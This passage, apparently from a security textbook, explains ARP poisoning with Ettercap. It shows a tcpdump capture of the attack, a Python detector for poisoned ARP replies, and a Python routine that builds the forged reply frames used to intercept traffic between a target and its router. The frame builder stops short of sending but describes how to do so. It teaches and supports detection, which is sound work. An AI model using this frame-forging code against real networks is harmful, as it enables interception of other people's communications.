Figure 2-8. Using Ettercap

The reason for having two targets is to make sure I get both sides of a conversation. If I poison only one party, I will get only half of it: Ettercap sends forged ARP replies to each target claiming that the other target's IP address lives at my MAC address, so each side has to be poisoned for its traffic toward the other to pass through me. I assume that what I want to gather is communication between my target and the internet. As a result, I set my target as one host and the router on my network as the second host. If I needed to acquire traffic between two systems on my network, I would select those instead: one in Target 1 and the other in Target 2. In Example 2-13, you can see what an ARP poison attack looks like in a packet capture. You will see the two ARP replies where the addresses belong to my two targets, both claiming the same MAC address. I included a portion of the ifconfig output from my system so you can see that the MAC address caught in the packet capture is the MAC address of my system, where I was running the ARP spoofing attack.
Example 2-13. tcpdump showing ARP poison attack

    17:06:46.690545 ARP, Reply rosebud.lan is-at 00:0c:29:94:ce:06 (oui Unknown), length 28
    17:06:46.690741 ARP, Reply testwifi.here is-at 00:0c:29:94:ce:06 (oui Unknown), length 28
    17:06:46.786532 ARP, Request who-has localhost.lan tell savagewood.lan, length 46
    ^C
    43 packets captured
    43 packets received by filter
    0 packets dropped by kernel
    root@kali:~# ifconfig eth0
    eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
            inet 192.168.86.227  netmask 255.255.255.0  broadcast 192.168.86.255
Poisoning Attacks | 71
            inet6 fe80::20c:29ff:fe94:ce06  prefixlen 64  scopeid 0x20<link>
            ether 00:0c:29:94:ce:06  txqueuelen 1000  (Ethernet)
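A quick way to spot this pattern in a capture is to look for one MAC address answering for more than one host, or one host answering from more than one MAC. The following is an added example, not code from the book or from Ettercap; it parses tcpdump ARP lines in the format of Example 2-13. The sample capture is constructed: it reuses the three lines from the example and adds two invented lines, a legitimate reply from a printer and the real rosebud.lan answering from its own MAC while the poisoner is also claiming it, so the detector has both a hit and a non-hit.

```python
import re
from collections import defaultdict

# Constructed sample capture: the three lines from Example 2-13 plus two invented
# ones (printer.lan, and rosebud.lan answering from its own MAC 08:00:27:aa:bb:cc).
SAMPLE_CAPTURE = """\
17:06:46.690545 ARP, Reply rosebud.lan is-at 00:0c:29:94:ce:06 (oui Unknown), length 28
17:06:46.690741 ARP, Reply testwifi.here is-at 00:0c:29:94:ce:06 (oui Unknown), length 28
17:06:46.786532 ARP, Request who-has localhost.lan tell savagewood.lan, length 46
17:06:47.102211 ARP, Reply printer.lan is-at 00:11:22:33:44:55 (oui Unknown), length 28
17:06:47.500339 ARP, Reply rosebud.lan is-at 08:00:27:aa:bb:cc (oui Unknown), length 28
"""

# tcpdump -n prints IP addresses instead of names; \S+ accepts either form.
ARP_REPLY = re.compile(
    r"^(?P<ts>\S+) ARP, Reply (?P<host>\S+) is-at "
    r"(?P<mac>(?:[0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2})"
)


def parse_arp_replies(text):
    """Yield (timestamp, host, mac) for each ARP Reply line; Requests are skipped."""
    for line in text.splitlines():
        m = ARP_REPLY.match(line)
        if m:
            yield m.group("ts"), m.group("host"), m.group("mac").lower()


def find_poisoning(text):
    """Two indicators of ARP poisoning in a capture.

    shared_macs:    one MAC claiming to be more than one host
                    (the poisoner claiming both Target 1 and Target 2)
    flapping_hosts: one host seen at more than one MAC
                    (the real owner and the poisoner both answering for it)
    """
    hosts_by_mac = defaultdict(set)
    macs_by_host = defaultdict(set)
    for _ts, host, mac in parse_arp_replies(text):
        hosts_by_mac[mac].add(host)
        macs_by_host[host].add(mac)
    shared_macs = {m: sorted(h) for m, h in hosts_by_mac.items() if len(h) > 1}
    flapping_hosts = {h: sorted(m) for h, m in macs_by_host.items() if len(m) > 1}
    return shared_macs, flapping_hosts


if __name__ == "__main__":
    shared, flapping = find_poisoning(SAMPLE_CAPTURE)
    for mac, hosts in shared.items():
        print(f"{mac} claims {len(hosts)} hosts: {', '.join(hosts)}")
    for host, macs in flapping.items():
        print(f"{host} seen at {len(macs)} MACs: {', '.join(macs)}")
```

Feed it the output of `tcpdump -i eth0 -n arp`. Treat shared_macs as a lead rather than proof: a router or a host carrying virtual IPs legitimately answers for several addresses from one MAC. A host flapping between two MACs during a capture is the stronger signal, because it means something other than the real owner is answering for that address.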
Once I have an ARP spoofing attack in place, I can capture entire conversations by using tcpdump or Wireshark. Keep in mind that this sort of attack works only on the local network. ARP is a layer 2 protocol: its messages travel directly inside Ethernet frames with no IP header, so a router never forwards them and they never cross a layer 3 boundary (moving from one network to another). The poisoned MAC address means something only on the segment where those frames are delivered. Ettercap also supports other attacks that depend on being on the same link as the victim, such as DHCP spoofing and ICMP redirects. Those two are not strictly layer 2 (DHCP and ICMP sit above it), but they rely on the same thing: you and the victim share a segment. Any of these may be ways to ensure you are grabbing traffic from other systems on your local network.
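To make the layer 2 point concrete, here is an added example (mine, not Ettercap's code) that builds the two forged ARP replies one poisoning round sends for a Target 1/Target 2 pair, as raw Ethernet frames, and decodes them again. The attacker's MAC and IP are the ones from the ifconfig output in Example 2-13; the target and router addresses (192.168.86.50, 192.168.86.1 and their MACs) are assumed values for illustration, since the book does not list them. The frames are only built and parsed here, never sent.

```python
import socket
import struct

ETHERTYPE_ARP = 0x0806   # EtherType that marks the frame as ARP
PTYPE_IPV4 = 0x0800      # protocol type inside the ARP message: IPv4 addresses
ARP_OP_REPLY = 2

# From the ifconfig output in Example 2-13 (the system running the attack).
ATTACKER_MAC = "00:0c:29:94:ce:06"
ATTACKER_IP = "192.168.86.227"
# Assumed values for the two Ettercap targets; the book does not give them.
TARGET_IP, TARGET_MAC = "192.168.86.50", "08:00:27:aa:bb:cc"
ROUTER_IP, ROUTER_MAC = "192.168.86.1", "3c:28:6d:11:22:33"


def mac_bytes(mac):
    return bytes.fromhex(mac.replace(":", ""))


def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def build_arp_reply(sender_ip, sender_mac, target_ip, target_mac):
    """Ethernet frame carrying the ARP reply '<sender_ip> is-at <sender_mac>',
    unicast to target_mac. Nobody asked for it; the receiver caches it anyway.
    Note there is no IP header anywhere in this frame, only Ethernet + ARP."""
    eth_hdr = mac_bytes(target_mac) + mac_bytes(sender_mac) + struct.pack("!H", ETHERTYPE_ARP)
    arp = struct.pack("!HHBBH", 1, PTYPE_IPV4, 6, 4, ARP_OP_REPLY)  # hw=Ethernet, hlen=6, plen=4
    arp += mac_bytes(sender_mac) + socket.inet_aton(sender_ip)      # sender hw / protocol address
    arp += mac_bytes(target_mac) + socket.inet_aton(target_ip)      # target hw / protocol address
    return eth_hdr + arp


def parse_arp(frame):
    """Decode an Ethernet+ARP frame into a dict; raises ValueError if it is not ARP."""
    dst, src, ethertype = struct.unpack("!6s6sH", frame[:14])
    if ethertype != ETHERTYPE_ARP:
        raise ValueError(f"not ARP: ethertype 0x{ethertype:04x}")
    _, _, _, _, op, sha, spa, tha, tpa = struct.unpack("!HHBBH6s4s6s4s", frame[14:42])
    return {
        "eth_dst": mac_str(dst), "eth_src": mac_str(src), "op": op,
        "sender_mac": mac_str(sha), "sender_ip": socket.inet_ntoa(spa),
        "target_mac": mac_str(tha), "target_ip": socket.inet_ntoa(tpa),
    }


def poison_pair(attacker_mac, t1_ip, t1_mac, t2_ip, t2_mac):
    """The two frames one poisoning round needs: tell Target 1 that Target 2's IP
    is at the attacker's MAC, and tell Target 2 the same about Target 1's IP."""
    return (
        build_arp_reply(t2_ip, attacker_mac, t1_ip, t1_mac),
        build_arp_reply(t1_ip, attacker_mac, t2_ip, t2_mac),
    )


def arp_payload_len(frame):
    """Bytes after the 14-byte Ethernet header; this is the 'length 28' tcpdump prints."""
    return len(frame) - 14


if __name__ == "__main__":
    for f in poison_pair(ATTACKER_MAC, TARGET_IP, TARGET_MAC, ROUTER_IP, ROUTER_MAC):
        p = parse_arp(f)
        print(f"Reply {p['sender_ip']} is-at {p['sender_mac']} "
              f"-> {p['eth_dst']}, length {arp_payload_len(f)}")
```

Putting these on the wire needs a raw AF_PACKET socket bound to eth0 and root privileges, which is what Ettercap does for you, and it has to keep resending them because the victims' ARP caches time out. The frame layout is the whole reason the attack is confined to the local segment: with no IP header there is nothing for a router to route, so the forged reply can only reach hosts that share the link.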